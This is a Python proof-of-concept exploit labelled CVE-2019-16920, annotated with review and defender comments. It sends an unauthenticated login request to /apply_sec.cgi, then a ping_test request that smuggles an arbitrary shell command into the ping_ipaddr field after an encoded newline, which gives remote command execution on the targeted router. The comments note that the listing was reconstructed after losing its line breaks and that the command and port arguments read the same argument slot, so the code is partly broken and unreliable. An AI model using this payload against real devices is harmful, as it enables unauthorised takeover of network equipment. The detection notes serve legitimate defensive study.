# Proof-of-concept request generator labelled CVE-2019-16920 (per the usage
# string at the bottom). It writes two hand-built HTTP POST requests for
# /apply_sec.cgi to a single TCP socket and never reads a reply.
#
# NOTE(review): this listing was extracted with its line breaks and
# indentation lost. The block structure below is the most plausible
# reconstruction; confirm it against the original file.
#
# Defender notes:
#   - Detection: the stable indicators are the request path /apply_sec.cgi
#     together with the body parameters action=ping_test and a ping_ipaddr
#     value that contains an encoded newline (%0a) or anything other than an
#     IP address/hostname. The User-Agent, Cookie, session_id and
#     Content-Length values are fixed literals in this script and are
#     trivially varied, so do not key signatures on them.
#   - Mitigation: keep the device's web management interface off untrusted
#     networks and follow the vendor advisory for this CVE (firmware update
#     or replacement); check the advisory for the affected models.
from socket import *
import sys
import time  # not referenced anywhere in this listing


def main():
    """Build and send the two POST requests described by this PoC.

    Reads its inputs from ``sys.argv`` rather than from parameters:
    ``host`` from ``argv[1]``, and both ``port`` and ``cmd`` from
    ``argv[2]`` as the listing is written. Returns ``None``.

    Every exception raised in the body, including a missing argument, is
    caught by the outer bare ``except`` and reported as the usage line, so
    the function itself does not raise.
    """
    try:
        host = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[2]  # same argv slot as `port` in this listing
        # First request: action=do_graph_auth with an empty log_pass.
        # login_name=YWRtaW4%3D is URL-encoded base64 for "admin", matching
        # login_n=admin. The Content-Length header is the literal 142.
        auth = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 142\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384"
        # Second request: action=ping_test. ping_ipaddr carries 127.0.0.1,
        # a URL-encoded newline (%0a), and then `cmd` appended verbatim.
        # This is the field a server-side validator or IDS rule should
        # inspect. The Content-Length header is the literal 131.
        execution = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 131\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a" + cmd
        sock = socket(AF_INET, SOCK_STREAM)
        try:
            print("[*]Sending payload")
            sock.connect((host, int(port)))
        except:
            # Bare except: a failed connect() or a non-numeric port only
            # prints this line. As reconstructed, execution then continues
            # to sendall() on the unconnected socket, and that error is
            # caught by the outer handler.
            print("[!]Unable to connect to host")
        # Both requests are written back-to-back on the same connection;
        # nothing is read from the socket in between or afterwards.
        sock.sendall(auth.encode())
        sock.sendall(execution.encode())
        sock.close()
        # Printed unconditionally after the writes. Because no response is
        # read, this message is not evidence that the device processed
        # either request.
        print("[*]Exploited!")
    except:
        # Bare except: a missing argument (IndexError) and every other
        # failure above are all reported as this usage line.
        print("[*]Usage CVE-2019-16920.py ip port command")


if __name__ == '__main__':
    main()